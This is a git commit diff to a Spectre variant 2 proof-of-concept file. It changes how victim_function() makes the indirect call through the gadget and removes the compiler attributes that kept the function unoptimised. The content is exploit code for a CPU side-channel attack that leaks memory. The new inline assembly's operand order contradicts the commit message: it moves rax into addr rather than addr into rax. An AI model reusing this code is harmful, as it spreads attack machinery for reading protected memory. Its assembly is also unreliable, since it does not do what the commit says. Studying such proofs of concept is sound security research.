Restore optimisation for victim_function() and fix the actual bug: put 'addr' in rax before calling gadget othewise there is a NULL dereference happening at architectural level when optimized

2022-03-29 15:10:04 +02:00 · 2022-03-29 15:10:04 +02:00 · 1556553f06
commit 1556553f06
parent daad45152a
1 changed files with 5 additions and 9 deletions
--- a/spectre_v2.c
+++ b/spectre_v2.c
@ -46,13 +46,7 @@ safe_target()
 // function that makes indirect call
 // note that addr will be passed to gadget via %rdi
 int 
-#if defined(__clang__)
-victim_function(char* addr, int	input) __attribute__ ((optnone))
-#elif defined(__GNUC__) || defined(__GNUG__)
-__attribute__((optimize("O0"))) victim_function(char* addr, int	input)
-#else
 victim_function(char* addr, int	input)
-#endif
 {
 	#pragma GCC diagnostic ignored "-Wuninitialized"
 	unsigned int result, junk = junk;
@ -65,10 +59,12 @@ victim_function(char* addr, int	input)
 		junk += input & i;
 	}
 	// call *target
-	__asm volatile("callq *%1\n"
-		 "mov %%eax, %0\n"
+	__asm volatile(
+		"mov %%rax, %2\n"
+        "callq *%1\n"
+		"mov %0, %%eax\n"
 		: "=r" (result)
-		: "r" (*target)
+		: "r" (*target), "r" (addr)
 		: "rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11");
 	return result & junk;
 }